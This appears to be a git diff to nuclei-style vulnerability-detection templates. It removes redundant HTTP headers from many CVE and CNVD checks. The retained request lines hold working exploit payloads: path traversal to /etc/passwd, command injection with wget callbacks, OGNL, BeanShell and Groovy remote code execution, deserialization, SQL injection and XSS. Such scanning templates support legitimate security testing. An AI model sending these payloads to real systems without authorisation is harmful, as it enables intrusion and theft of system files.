removed extra headers not required for template

cnvd/CNVD-2020-68596.yaml

@@ -12,24 +12,17 @@ requests:
       - |
         POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Content-Length: 5
         Content-Type: application/x-www-form-urlencoded
-        Accept-Encoding: deflate
 
         "1":1
       - |
         GET /public/index.php/home/file/user_pics HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+
-        Accept-Encoding: gzip
-        Accept-Encoding: deflate
 
       - |
         GET {{endpoint}} HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Accept-Encoding: deflate
 
     extractors:
       - type: regex

cnvd/CNVD-2021-15822.yaml

@@ -12,7 +12,6 @@ requests:
       - |
         GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=  HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
         Content-Type: application/x-www-form-urlencoded
 
     matchers-condition: and

cnvd/CNVD-2021-30167.yaml

@@ -14,7 +14,6 @@ requests:
       - | #linux
         POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
         Content-Type: application/x-www-form-urlencoded
 
         bsh.script=exec("id");
@@ -22,7 +21,6 @@ requests:
       - | #windows
         POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
         Content-Type: application/x-www-form-urlencoded
 
         bsh.script=exec("ipconfig");

cves/2009/CVE-2009-1151.yaml

@@ -17,11 +17,7 @@ requests:
         Host: {{Hostname}}
         Accept-Encoding: gzip, deflate
         Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 80
 
         action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
 

cves/2012/CVE-2012-1823.yaml

@@ -16,9 +16,7 @@ requests:
       - |
         POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 31
 
         <?php echo shell_exec("cat /etc/passwd"); ?>
 

cves/2014/CVE-2014-3120.yaml

@@ -18,10 +18,7 @@ requests:
         Host: {{Hostname}}
         Accept: */*
         Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 343
 
         {
             "size": 1,

cves/2015/CVE-2015-1427.yaml

@@ -17,10 +17,7 @@ requests:
         Host: {{Hostname}}
         Accept: */*
         Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 343
 
         {
           "name": "test"
@@ -29,11 +26,7 @@ requests:
         POST /_search HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 343
 
         {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
 

cves/2016/CVE-2016-10033.yaml

@@ -12,18 +12,12 @@ requests:
       - |+
         GET /?author=1 HTTP/1.1
         Host: {{Hostname}}
-        Cache-Control: max-age=0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
 
       - |+
         POST /wp-login.php?action=lostpassword HTTP/1.1
         Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
-        Connection: close
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
         Accept: */*
-        Content-Length: 56
         Content-Type: application/x-www-form-urlencoded
 
         wp-submit=Get+New+Password&redirect_to=&user_login={{username}}

cves/2016/CVE-2016-3081.yaml

@@ -16,7 +16,6 @@ requests:
       - |
         GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 4
 
     matchers-condition: and
     matchers:

cves/2017/CVE-2017-1000486.yaml

@@ -17,10 +17,7 @@ requests:
       - |
         POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        Content-Length: 160
         Accept: */*
-        Accept-Language: en
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip, deflate
 

cves/2017/CVE-2017-10271.yaml

@@ -17,10 +17,7 @@ requests:
         Host: {{Hostname}}
         Accept: */*
         Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Content-Type: text/xml
-        Content-Length: 5178
 
         <?xml version="1.0" encoding="utf-8"?>
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

cves/2017/CVE-2017-12635.yaml

@@ -13,11 +13,7 @@ requests:
       - |
         PUT /_users/org.couchdb.user:poc HTTP/1.1
         Host:  {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: application/json
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-        Content-Length: 108
 
         {
           "type": "user",

cves/2017/CVE-2017-14537.yaml

@@ -16,35 +16,28 @@ requests:
       - |
         POST /maint/index.php?packages HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
         Content-Type: application/x-www-form-urlencoded
         Referer: {{Hostname}}/maint/index.php?packages
-        Content-Length: 160
         Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
         Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
-        Connection: keep-alive
 
         xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
 
       - |
         GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Referer: {{Hostname}}/maint/index.php?packages
         Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
         Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
-        Connection: keep-alive
-        Upgrade-Insecure-Requests: 1
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "root:.*:0:0:"

cves/2017/CVE-2017-15715.yaml

@@ -13,10 +13,7 @@ requests:
       - |
         POST / HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 264
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
-        Accept-Encoding: gzip, deflate
-        Connection: close
 
         ------WebKitFormBoundaryKc8fBVDo558U4hbJ
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
@@ -34,9 +31,6 @@ requests:
         Host: {{Hostname}}
         Accept-Encoding: gzip,deflate
         Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
 
     req-condition: true
     matchers:

cves/2017/CVE-2017-17562.yaml

@@ -14,11 +14,9 @@ info:
 requests:
   - raw:
       - |
-        GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
+        GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
         Accept: */*
-        Connection: close
 
     payloads:
       endpoint:

cves/2017/CVE-2017-3506.yaml

@@ -16,10 +16,8 @@ requests:
         POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
         Host: {{Hostname}}
         Content-Type: text/xml
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
         Content-Type: text/xml;charset=UTF-8
-        Content-Length: 873
 
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
           <soapenv:Header>

cves/2017/CVE-2017-5638.yaml

@@ -13,11 +13,7 @@ requests:
         GET / HTTP/1.1
         Host: {{Hostname}}
         Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
-        Accept-Language: en
         Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
-        Connection: Keep-Alive
-        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
-        Pragma: no-cache
         Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
 
     matchers:

cves/2017/CVE-2017-9506.yaml

@@ -17,10 +17,6 @@ requests:
         GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.9
 
     matchers:
       - type: word

cves/2017/CVE-2017-9822.yaml

@@ -13,12 +13,8 @@ requests:
       - |
         GET /__ HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
         Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
-        Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
-        Accept-Encoding: gzip, deflate
         X-Requested-With: XMLHttpRequest
-        Connection: close
         Cookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
 
     matchers-condition: and

cves/2017/CVE-2017-9841.yaml

@@ -18,78 +18,42 @@ requests:
       - |
         GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 
       - |
         GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 
       - |
         GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 
       - |
         GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 
       - |
         GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 
       - |
         GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
-        Connection: close
-        Content-Length: 17
-        Accept: */*
-        Accept-Language: en
         Content-Type: text/html
-        Accept-Encoding: gzip, deflate
 
         <?php echo md5(phpunit_rce);?>
 

cves/2018/CVE-2018-1000130.yaml

@@ -12,21 +12,15 @@ requests:
       - |
         POST /jolokia/read/getDiagnosticOptions HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
-        Accept-Language: en-GB,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        Connection: close
-        Upgrade-Insecure-Requests: 1
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 167
 
         {
-            "type" : "read",
+           "type":"read",
-            "mbean" : "java.lang:type=Memory",
+           "mbean":"java.lang:type=Memory",
-            "target" : {
+           "target":{
-                 "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
+              "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
-            }
+           }
         }
 
     matchers-condition: and
@@ -35,6 +29,7 @@ requests:
         words:
           - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
         part: body
+
       - type: status
         status:
           - 200

cves/2018/CVE-2018-1000533.yaml

@@ -17,8 +17,6 @@ requests:
       - |
         POST /{{path}}/tree/a/search HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Content-Length: 45
         Content-Type: application/x-www-form-urlencoded
 
         query=--open-files-in-pager=cat%20/etc/passwd

cves/2018/CVE-2018-10141.yaml

@@ -12,8 +12,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
 
     matchers-condition: and
     matchers:

cves/2018/CVE-2018-10818.yaml

@@ -15,8 +15,6 @@ requests:
       - |
         POST /system/sharedir.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: curl/7.58.0
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
 
         &uid=10; wget http://{{interactsh-url}}
@@ -24,8 +22,6 @@ requests:
       - |
         POST /en/php/usb_sync.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: curl/7.58.0
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
 
         &act=sync&task_number=1;wget http://{{interactsh-url}}

cves/2018/CVE-2018-16167.yaml

@@ -15,10 +15,6 @@ requests:
       - |
         POST /upload HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.18.4
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
         Content-Type: application/x-www-form-urlencoded
 
         logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B

cves/2018/CVE-2018-16763.yaml

@@ -15,7 +15,6 @@ requests:
       - |
         GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
 
     matchers-condition: and
     matchers:

cves/2018/CVE-2018-17254.yaml

@@ -15,7 +15,6 @@ requests:
       - |
         GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
         Referer: {{BaseURL}}
 
     matchers:

cves/2018/CVE-2018-18778.yaml

@@ -13,7 +13,6 @@ requests:
       - |+
         GET /etc/passwd HTTP/1.1
         Host:
-        Content-Length: 4
 
     unsafe: true
     matchers-condition: and
@@ -21,6 +20,7 @@ requests:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "root:.*:0:0:"

cves/2018/CVE-2018-3760.yaml

@@ -19,13 +19,10 @@ requests:
       - |
         GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Content-Length: 94
 
       - |
         GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
 
     extractors:
       - type: regex

cves/2018/CVE-2018-7600.yaml

@@ -12,13 +12,10 @@ requests:
       - |
         POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
         Host:  {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: application/json
         Referer:  {{Hostname}}/user/register
         X-Requested-With: XMLHttpRequest
         Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-        Content-Length: 626
-        Connection: close
 
         -----------------------------99533888113153068481322586663
         Content-Disposition: form-data; name="mail[#post_render][]"

cves/2018/CVE-2018-8715.yaml

@@ -14,11 +14,6 @@ requests:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
-        Connection: close
         Authorization: Digest username=admin
 
     matchers-condition: and

cves/2019/CVE-2019-1010287.yaml

@@ -16,14 +16,7 @@ requests:
       - |
         POST /timesheet/login.php HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 91
-        DNT: 1
-        Connection: keep-alive
-        Upgrade-Insecure-Requests: 1
 
         username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
 
@@ -32,6 +25,7 @@ requests:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - '><script>javascript:alert(document.domain)</script>'

cves/2019/CVE-2019-11869.yaml

@@ -22,7 +22,6 @@ requests:
       - |
         POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Content-Type: application/x-www-form-urlencoded
 
         yuzo_related_post_css_and_style=</style><script>alert(0);</script>
@@ -30,8 +29,6 @@ requests:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Upgrade-Insecure-Requests: 1
 
     req-condition: true
     matchers-condition: and

cves/2019/CVE-2019-13101.yaml

@@ -17,8 +17,6 @@ requests:
         GET /wan.htm HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
     matchers-condition: and
     matchers:

cves/2019/CVE-2019-15107.yaml

@@ -13,14 +13,9 @@ requests:
       - |
         POST /password_change.cgi HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
-        Referer: https://{{Hostname}}/
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 73
-        Connection: close
-        Upgrade-Insecure-Requests: 1
 
         user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2
 

cves/2019/CVE-2019-16278.yaml

@@ -12,9 +12,6 @@ requests:
       - |
         POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
-        Content-Length: 1
-        Connection: close
 
         echo
         echo

cves/2019/CVE-2019-16920.yaml

@@ -13,41 +13,27 @@ requests:
       - |
         POST /apply_sec.cgi HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
+        Referer: {{BaseURL}}
-        Referer: http://{{Hostname}}/
-        Upgrade-Insecure-Requests: 1
 
         html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
       - |
         POST /apply_sec.cgi HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
+        Referer: {{BaseURL}}/login_pic.asp
-        Referer: http://{{Hostname}}/login_pic.asp
         Cookie: uid=1234123
-        Upgrade-Insecure-Requests: 1
 
         html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
       - |
         POST /apply_sec.cgi HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
+        Referer: {{BaseURL}}/login_pic.asp
-        Referer: http://{{Hostname}}/login_pic.asp
         Cookie: uid=1234123
-        Upgrade-Insecure-Requests: 1
 
         html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
+
     matchers-condition: and
     matchers:
       - type: regex
@@ -55,6 +41,7 @@ requests:
           - "root:.*:0:0:"
           - "\\[(font|extension|file)s\\]"
         condition: or
+
         part: body
       - type: status
         status:

cves/2019/CVE-2019-17382.yaml

@@ -13,7 +13,6 @@ requests:
       - |
         GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
         Accept-Language: en-US,en;q=0.9
 
     payloads:

cves/2019/CVE-2019-17558.yaml

@@ -11,14 +11,11 @@ requests:
       - |
         GET /solr/admin/cores?wt=json HTTP/1.1
         Host: {{Hostname}}
-        Accept-Language: en
-        Connection: close
 
       - |
         POST /solr/{{core}}/config HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Content-Length: 259
 
         {
             "update-queryresponsewriter": {

cves/2019/CVE-2019-2616.yaml

@@ -16,7 +16,6 @@ requests:
         POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
         Host: {{Hostname}}
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Content-Length: 76
         Content-Type: text/xml; charset=UTF-8
 
         <!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">

cves/2019/CVE-2019-3396.yaml

@@ -12,12 +12,7 @@ requests:
       - |
         POST /rest/tinymce/1/macro/preview HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
-        Accept-Language: en-US,en;q=0.5
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
         Referer: {{Hostname}}
-        Content-Length: 168
-        Connection: close
 
         {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
 
@@ -26,6 +21,7 @@ requests:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "<param-name>contextConfigLocation</param-name>"

cves/2019/CVE-2019-6715.yaml

@@ -12,11 +12,7 @@ requests:
       - |
         PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
-        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
-        Content-Length: 124
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
 
